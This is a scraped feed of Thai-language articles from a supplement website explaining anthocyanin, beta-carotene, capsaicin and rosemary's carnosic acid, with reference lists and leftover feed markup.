Nagaki et al., (2006) .The supplementation effect of astaxanthin on accommodation and asthenopia.J.Clin. Therap.Med.,22(1):41-54.
Sawaki,K.et al.(2002) Sports performance benefits from taking natural astaxanthin characterized by visual activity and muscle fatigue improvements in humans.Journal of Clinical Therapeutics & Medicine 18(9):73-88.
Kupcinskas et al., Efficacy of the antioxidant astaxanthin in the treatment of functional dyspepsia in patients with or without Helicobacter pylori gastritis: a propective, randomized ,double blind, and placebo controlled study .Eur.J.Gastroent and Hepat.,(In Press).
Hiroshige Itakura, Astaxanthin Defends and Subdues Active Oxygen, Heart publishing co.,ltd, 21.
The post แอสต้าแซนทิน คืออะไร first appeared on วิตามิน.com.
]]>The post แอนโทไซยานิน คืออะไร first appeared on วิตามิน.com.
]]>แอนโทไซยานิน (anthocyanin)
แอนโทไซยานิน เป็นรงควัตถุหรือสารสี (pigment) ที่ให้สีแดง ม่วง และน้ำเงิน ใช้เป็นสารให้สี (coloring agent) ธรรมชาติในอาหาร สารสกัดแอนโทไซยานิน มีสมบัติเป็นโภชนะเภสัช (nutraceutical) เป็นสารต้านอนุมูลอิสระ (antioxidant) ช่วยชะลอความเสื่อมของเซลล์ ช่วยลดอัตราเสี่ยงของการเกิดโรคหัวใจและเส้นเลือดอุดตันในสมอง ด้วยการยับยั้งไม่ให้เลือดจับตัวเป็นก้อน ชะลอความเสื่อมของดวงตา ช่วยยับยั้งจุลินทรีย์ก่อโรค (pathogen) อีโคไล (Escherichia coli) ในระบบทางเดินอาหาร ซึ่งเป็นสาเหตุของโรคท้องร่วงและอาหารเป็นพิษด้วย
แหล่งที่พบ
อาหารที่เป็นแหล่งสำคัญของแอนโทไซยานิน ได้แก่
โมเลกุลของแอนโทไซยานิน
แอนโทไซยานิน (anthocyanins) จัดอยู่ในกลุ่มสารประกอบฟีนอล (phenolic compounds) กลุ่มพอลิฟีนอล (polyphenol)
สีของแอนโทไซยานิน
แอนโทไซยานิน เป็นสารสีที่พบได้ทั่วไปในดอกไม้ ผลไม้บางชนิด ใบหรือลำต้นของพืชบางชนิดที่มีสีตั้งแต่สีแดงถึงน้ำเงินเข้ม ในสภาพที่เป็นกรดมีค่า pH ต่ำกว่า 3 (เป็นกรดสูง) จะทำให้แอนโทไซยานินมีสีแดง ในสภาพที่ค่อนข้างเป็นกลาง หรือมีค่า pH ประมาณ 7-8 แอนโทไซยานินจะมีสีม่วง และเมื่อสภาพเป็นเบสหรือมีค่า pH มากกว่า 11 (เป็นเบสสูง) แอนโทไซยานินจะเปลี่ยนเป็นสีน้ำเงิน
การนำแอนโทไซยานินมาใช้เป็นสารให้สี (coloring agent) ธรรมชาติในอาหาร เช่น ใช้สีจากดอกอัญชันทำขนมไทย หลายชนิด
ประโยชน์ต่อสุขภาพของแอนโทไซยานิน
ผลของการแปรรูปอาหารต่อแอนโทไซยานิน
Reference
Lazze, M.C., Savio, M., Pizzala, R., Cazzalini, O., Perucca, P., Scovassi, A.I., Stivala, L.A.,Bianchi,L. (2004) . Anthocyanins induce cell cycle perturbations and apoptosis in different human celllines. Carcinogenesis, 25: 1427-1433.
The post แอนโทไซยานิน คืออะไร first appeared on วิตามิน.com.
]]>The post เบต้าแคโรทิน คืออะไร first appeared on วิตามิน.com.
]]>เบต้าแคโรทีน (Beta-carotene)
มีบทบาทสำคัญในการรักษาสุขภาพและเพิ่มระบบภูมิคุ้มกันให้แข็งแรง ทั้งนี้ โดยปกติร่างกายของมนุษย์เราสามารถเปลี่ยนเบต้าแคโรทีนไปเป็นวิตามินเอได้ตามปริมาณที่ร่างกายต้องการ นอกจากนี้ยังทำหน้าที่เสมือนเป็นสารต้านอนุมูลอิสระด้วย เป็นลิพิด (lipid) กลุ่มรงควัตถุ (pigment) ที่มีสีส้ม สีเหลือง อยู่ในกลุ่มแคโรทีนอยด์ (carotenoid) จัดเป็นแคโรทีนอยด์พวกที่เป็นสารตั้งต้นของ วิตามินเอ (pro vitamin A) เพราะสามารถเปลี่ยนรูปเป็น เรตินอล (retinol) ได้ที่เยื่อบุผนังลำไส้เล็กและตับ
แหล่งอาหารของเบต้าแคโรทีน
ปัจจุบันมีหลายบริษัททางด้านอาหาร และเครื่องดื่มที่มีการนำเบต้าแคโรทีนมาผสมในอาหารเสริมเพื่อบำรุงร่างกาย เช่น น้ำผลไม้ นมผง เครื่องดื่มเกลือแร่ เป็นต้น สำหรับการรับประทานวิตามินเอเพื่อรักษาสุขภาพจะอยู่ที่ประมาณ 5,000 หน่วยสากล (IU) หรือเทียบเท่ากับเบต้าแคโรทีนที่ 3 มิลลิกรัม/วัน ส่วนปริมาณเบต้าแคโรทีนที่รับประทานเพื่อรักษาสุขภาพให้แข็งแรงจะอยู่ที่ประมาณ 15 มิลลิกรัม/วัน
ประโยชน์ของเบต้าแคโรทีน
เบต้าแคโรทีน นับเป็นสารอาหารที่มีบทบาทสำคัญสำหรับสุขภาพของมนุษย์ อย่างไรก็ตามไม่พบว่ามีรายงานของการขาดเบต้าแคโรทีนเลย แม้ว่าการวิจัยจำนวนมากจะระบุว่า การเสริมด้วยเบต้าแคโรทีนใช้ในคนที่มีอาการขาดวิตามินเอ แต่ก็ยังคงไม่มีข้อมูลแน่ชัดที่แสดงถึงอาการขาดเบต้าแคโรทีน ซึ่งนักวิทยาศาสตร์และนักโภชนาการแนะนำว่าเราควรรับประทานเบต้าแคโรทีนเข้าสู่ร่างกายโดยการบริโภคผักสดและผลไม้สด
โทษเบต้าแคโรทีน
สารเบต้าแคโรทีนเป็นสารต้านอนุมูลอิสระ (Antioxidant) หากร่างกายได้รับเกินความต้องการจะกลายเป็นสาร Pro-Oxidant ที่ช่วยส่งเสริมการเกิดสารอนุมูลอิสระ ทำให้เพิ่มความเสี่ยงต่อโรคมะเร็ง และโรคในระบบหลอดเลือด และหัวใจ โดยเฉพาะการรับประทานเบต้าแคโรทีนจากผลิตภัณฑ์อาหารเสริมที่มีความเข้มข้นสูงหรือรับประทานในปริมาณที่มากเกินขนาด ประกอบกับปกติร่างกายจะรับเบต้าแคโรทีนได้จากอาหารที่รับประทาานในแต่ละวัน เช่น ผักสีเขียว และผลไม้ชนิดต่างๆ จึงอาจเสี่ยงต่อการได้รับสารเบต้าแคโรทีนเกินความต้องการของร่างกายได้ ดังนั้น การรับประทานอาหารเสริมเบต้าแคโรทีนจึงต้องรับประทานในปริมาณที่พอเหมาะกับความต้องการของร่างกาย
ข้อมูลอ้างอิง
เบต้าแคโรทีน จากวิกิพีเดีย สารานุกรมเสรี http://goo.gl/ahBSz1
Carotenoid / แคโรทีนอยด์ – Food Wiki http://goo.gl/qa0UHq
beta-Carotene From Wikipedia, the free encyclopediahttp://en.wikipedia.org/wiki/Beta-Carotene
Beta-Carotene Supplements for Vision and Osteoarthritis – WebMDhttp://www.webmd.com/vitamins-and-supplements/lifestyle-guide-11/beta-carotene
Beta Carotene Benefits – Vitamins and Nutrition Centerwww.vitamins-nutrition.org/vitamins/beta-carotene.html
The post เบต้าแคโรทิน คืออะไร first appeared on วิตามิน.com.
]]>The post แคปไซซิน คืออะไร first appeared on วิตามิน.com.
]]>แคปไซซิน (Capsaicin)
สารสำคัญในพริก คือ แคปไซซิน(Capsaicin) ที่ทำให้พริกมีรสเผ็ดร้อน ทางวงการลดความอ้วนนำสารสกัดจากพริก มาเป็นส่วนผสมในผลิตภัณฑ์ที่เร่งเผาผลาญไขมัน นอกจากพริกแล้ว สารแคปไซซิน ยังพบได้ในพริกไทยอีกด้วยแคปไซซิน (capsaicin) เป็นสารประกอบฟีนอลิก (phenolic compound) ที่พบตามธรรมชาติในพริก ส่วนใหญ่จะอยู่ในบริเวณเยื่อแกนกลางสีขาว หรือเรียกว่า “รก” (placenta) ส่วนของเนื้อผลพริก เปลือกผล และเมล็ดจะมีสารแคปไซซินอยู่น้อยมาก
โครงสร้างโมเลกุล
แคปไซซิน เป็นสารหลักของสารในกลุ่มแคปไซซินอยด์ (capsicinoids) โดยทั่วไปแคปไซซินอยด์จะประกอบด้วยแคปไซซิน 70% และไฮโดรแคปไซซิน 22% และสารอื่นๆ อีก 8% แคปไซซินมี สูตรโมเลกุล C18 H23 NO3 โครงสร้างเคมีคือ 8-methyl-n-vanillyl-6-noneamide มีน้ำหนักโมเลกุล 305.46
ปริมาณของสารแคปไซซินจะแตกต่างกันออกไปตามชนิดและสายพันธุ์ของพริก กล่าวคือ ปริมาณของสารแคปไซซิน มากน้อยเรียงตามลำดับ ดังนี้คือ พริกขี้หนู 18.2 ppm (ส่วนในล้านส่วน) พริกเหลือง 16.7 ppm พริกชี้ฟ้า 4.5 ppm พริกหยวก 3.8 ppm พริกหวาน (พริกยักษ์) 1.6 ppm
สมบัติของแคปไซซิน
แคปไซซิน ไม่มีสี ไม่มีกลิ่น ละลายในน้ำได้เล็กน้อย และละลายได้ในไขมันน้ำมัน และแอลกอฮอล์ได้ดี มีจุดหลอมเหลว 65 องศาเซลเซียส ทนความร้อนและความเย็นได้ดีด้วย
ประโยชน์ของแคปไซซิน
ข้อควรระวังในการรับประทาน
พริกทั่วไปมีความระคายเคืองต่อเนื้อเยื่อ ทั้งในช่องปาก และกระเพาะอาหาร หากรับประทานมากจะทำให้เนื้อเยื่ออักเสบ บวม และแสบร้อนได้ ดังนั้น ผู้ป่วยโรคกระเพาะ และริดสีดวงทวารหนัก จึงไม่ควรบริโภคพริก
ขอขอบคุณข้อมูลจาก: คู่มืออาหารเสริม, ดร.เริงฤทธ์ สัปปพันธ์
http://www.agric-prod.mju.ac.th/web-veg/article/new128.htm
The post แคปไซซิน คืออะไร first appeared on วิตามิน.com.
]]>The post กรดคาร์โนซิค คืออะไร first appeared on วิตามิน.com.
]]>กรดคาร์โนซิค (Carnosic acid)
โรสแมรี่เป็นพืชที่มีชื่อทางพฤกษศาสตร์ว่าโรสมารินัส อ๊อฟฟิซซินาลีส (Rosemarinus officinalis L.)เดิมทีเดียว โรสแมรี่ เป็นพืชที่ขึ้นอยู่ในแถบทะเลเมดิเตอร์เรเนียนแต่ปัจจุบันพบมากในแถบอเมริกาเหนือซึ่งผู้คนในแถบดังกล่าวนิยมนำโรสแมรี่มาใช้ประโยชน์ในการบำรุงสุขภาพกันมาตั้งแต่ครั้งโบราณ และส่วนที่นิยมนำมาใช้ประโยชน์ในสรรพคุณดังกล่าว ก็คือ ส่วนของ ใบ (Leaf) และ นอกจากนั้น ดอกของ โรสแมรี่ ยังถูกใช้เป็นสัญญลักษณ์แห่งความรัก (Love charm) และ สัญญลักษณ์แห่งความทรงจำ (Remembrance) ในเทศกาลต่างๆ อีกด้วย
ในทางวิทยาศาสตร์สมัยใหม่นั้น นักวิทยาศาสตร์ได้ทำการตรวจสอบและได้ทำการศึกษาวิจัย โรสแมรี่โดยเฉพาะสารสกัดที่เราได้จากส่วนใบของ โรสแมรี่ (Rosemary Extract) กันมาเป็นเวลานานจนกระทั่งทำให้พบว่า สารสกัดจากโรสแมรี่นั้นเป็นส่วนผสมของสารจากธรรม–ชาติมากมายหลายชนิดซึ่งส่วนใหญ่แล้ว สารที่มีประโยชน์ต่อสุขภาพร่างกายของคนเราที่มีอยู่ในสารสกัดดังกล่าวเป็นสารเคมีในกลุ่มของ ฟีนอลลิคไดเทอร์ปีน (Phenolic Diterpine) โดยพบว่าสารเหล่านี้จะให้ผลในการกำจัดสารพิษชนิด ต่างๆ ในร่างกาย โดยเฉพาะอนุมูลอิสระ (Free Radicals) ที่มีผลในการทำลายเซลล์และเพิ่มความเสี่ยงต่อการเกิดภาวะมะเร็ง สารสำคัญจากโรสแมรี่ที่มีการวิจัยกัน อย่างกว้าง และพบว่าให้ผลดังกล่าวอย่างชัดเจนก็คือ กรดโรสมารินิค (Rosmarinic Acid) กรดคาร์โนซิค (Carnosic Acid) และคาร์นาโซล (Carnasol)
ผลด้านการกำจัดอนุมูลอิสระ
จากผลการศึกษาวิจัยของคณะนักวิทยาศาสตร์ ที่ประกอบด้วยDr.Aruoma OI และ คณะฯจากมหาวิทยาลัยคิงส์ คอลเลจ ลอนดอน ประเทศอังกฤษ ซึ่งได้ตีพิมพ์ในวารสาร ซีโนไบโอติค (Xenobiotic)ได้แสดงไว้อย่างชัดเจนว่าสารสกัด กรดคาร์โนซิคและคาร์นาโซล ให้ผลในการลดการทำลายเยื่อหุ้มเซลล์และสารพันธุกรรม DNA จากความเป็นพิษของอนุมูลอิสระและยังให้ผลในการลดฤทธิ์การทำลายเซลล์ของอนุมูลอิสระหลายชนิด เช่น ไลปิดเปอร์อ๊อกไซด์ (Lipidperoxide) เปอร์ร๊อก ซิลเรติคัล (PeroxylRadicals) และไฮดร๊อกซิลเรติคัล (Hydroxyl Radicals) ฯลฯและจากผลการวิจัยของDr.Singletary K จากภาควิชาวิทยาศาสตร์การอาหารและสารอาหารสำหรับมนุษย์(DepartmentofFoodScienceand Human Nutrition) มหาวิทยาลัยแห่งอิลินอยด์ ประเทศสหรัฐอเมริกาซึ่งตีพิมพ์ในวารสาร Cancer letter ปี 1996 ก็ได้แสดงให้เห็นว่าสารสกัดคาร์นาโซล และ กรดเออร์โซลิค (Ursolic Acid) จาก โรสแมรี่มีส่วนที่สามารถให้ผลในการต้านภาวะมะเร็งหรือ ทูเมอร์ (Antitumerigenic Activity)ได้ในสัตว์ทดลองโดยเฉพาะในสัตว์เลี้ยงลูกด้วยนมและจากบทความทางวิชาการและการศึกษาของDr.al – Seriti MR. และคณะฯ มหาวิทยาศาสตร์การแพทย์เมืองตริโปลีประเทศลิเบียที่ได้ตีพิมพ์ในวารสารIndian Journal Experimental Biology ปี 1999 ก็แสดงให้เห็นว่าสารสกัด กรดโรสมารินิค จากโรสแมรี่ ยังให้ผลในการป้องกันภาวะหอบหืด ภาวะการเกร็งของทางเดินอาหาร โรคแผลในกระเพาะอาหารภาวะการอักเสบ ภาวะหลอดเลือดแข็งตัว ภาวะหัวใจขาดเลือด ภาวะต้อกระจก ภาวะมะเร็ง และภาวะที่ตัวอสุจิในเพศชายมีความบกพร่อง ซึ่งในความเป็นจริงแล้วผลต่างๆ ที่กล่าวถึงนี้พบว่า เป็นผลจากฤทธิ์ในการต้านความเป็นพิษจากอนุมูลอิสระ (Free Radicals) นั่นเอง
อนุมูลอิสระ (Free Radicals) นั้น หลายคนคงเริ่มรู้จักแล้วว่าในความเป็นจริงก็คือ สารพิษที่มีอยู่รอบตัวเรา รวมทั้งจากมลภาวะจากสารเติมแต่งในอาหารที่รับประทาน และจากการศึกษายังพบว่า ขบวนการเผาผลาญสารอาหารหรือขบวนการทางชีวเคมีต่างๆ ในร่างกายของ เราก็สามารถสร้างอนุมูลอิสระเหล่านี้ได้เช่นกัน และอนุมูลอิสระเหล่านี้เองที่เป็นสาเหตุของโรคภัยไข้เจ็บในยุคสมัยใหม่นี้อย่างมากมาย และหลายโรคเป็นโรคที่น่าสะพรึงกลัว เนื่องจากยากในการรักษาให้หาย ในหลายภาวะ อย่างเช่น ในภาวะที่เรามีความเครียดสูง หรือแม้ในขณะที่ร่างกายของเรามีขบวนการในการเผาผลาญพลังงานสูง อย่างเช่นในผู้ที่อยู่ในโปรแกรมลดไขมันสะสมซึ่งล้วนเป็นภาวะที่เร่งให้ร่างกายของเรามีขบวนการทางชีวเคมีเพิ่มมากขึ้น ซึ่งนั่นก็เท่ากับว่าไปเร่งให้มีการสร้างอนุมูลอิสระภายในร่ายกายของเรามากขึ้นดังนั้น ในผู้ที่อยู่ในภาวะดังกล่าวจึงมีความจำเป็นอย่างยิ่งที่จะหันมาพิจารณากำจัดอนุมูลอิสระออกไปจากร่างกายเพื่อป้องกันภาวะความบกพร่องต่างๆในร่างกายที่อาจจะเกิดขึ้นได้จากอนุมูลอิสระเหล่านี้
และสารสกัดจากโรสแมรี่ ที่ให้สารสำคัญที่ได้รับการศึกษาวิจัยทั้งในทางการแพทย์และโภชนาการแล้วว่าเป็นสารที่ให้ผลในการกำจัด สารพิษอนุมูลอิสระได้อย่างดี และมีความปลอดภัยเนื่องจากเป็นสารสกัดจากธรรมชาติจึงถือเป็นทางเลือกที่น่าสนใจ และกำลังได้รับความ นิยมอย่างสูง
ช่วยลดการทำลายเยื่อหุ้มเซลล์ทำให้อนุมูลอิสระมาทำร้ายเซลล์ในร่างกายไม่ได้
The post กรดคาร์โนซิค คืออะไร first appeared on วิตามิน.com.
]]>